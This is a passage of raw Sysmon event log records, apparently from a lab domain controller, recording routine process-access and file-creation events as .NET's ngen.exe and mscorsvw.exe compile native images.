s\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:13.793","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04CD-5F25-0000-001047CE1000}","TargetProcessId":"4924","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7906,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:13.793\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04CD-5F25-0000-001047CE1000}\r\nTargetProcessId: 4924\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:13.793","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04CD-5F25-0000-001047CE1000}","TargetProcessId":"4924","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7907,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:13.793\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04CD-5F25-0000-001047CE1000}\r\nTargetProcessId: 4924\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:13.793","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04CD-5F25-0000-001047CE1000}","TargetProcessId":"4924","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7908,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:13.872\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04ED-5F25-0000-0010EC0B1200}\r\nTargetProcessId: 5052\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:13.872","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04ED-5F25-0000-0010EC0B1200}","TargetProcessId":"5052","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7909,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:13.872\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04ED-5F25-0000-0010EC0B1200}\r\nTargetProcessId: 5052\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:13.872","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04ED-5F25-0000-0010EC0B1200}","TargetProcessId":"5052","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:13","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7910,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:13.872\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04ED-5F25-0000-0010EC0B1200}\r\nTargetProcessId: 5052\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:13.872","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04ED-5F25-0000-0010EC0B1200}","TargetProcessId":"5052","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7911,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:15.106\r\nProcessGuid: {A837DB8D-04ED-5F25-0000-0010EC0B1200}\r\nProcessId: 5052\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13bc-0\\System.Windows.Controls.Ribbon.dll\r\nCreationUtcTime: 2020-08-01 06:00:15.106","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:15.106","ProcessGuid":"{A837DB8D-04ED-5F25-0000-0010EC0B1200}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13bc-0\\System.Windows.Controls.Ribbon.dll","CreationUtcTime":"2020-08-01 06:00:15.106","EventReceivedTime":"2020-08-01 06:00:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7912,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:15.168\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04EF-5F25-0000-001079111200}\r\nTargetProcessId: 172\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:15.168","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04EF-5F25-0000-001079111200}","TargetProcessId":"172","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7913,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:15.168\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04EF-5F25-0000-001079111200}\r\nTargetProcessId: 172\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:15.168","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04EF-5F25-0000-001079111200}","TargetProcessId":"172","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:15","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7914,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:15.168\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04EF-5F25-0000-001079111200}\r\nTargetProcessId: 172\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 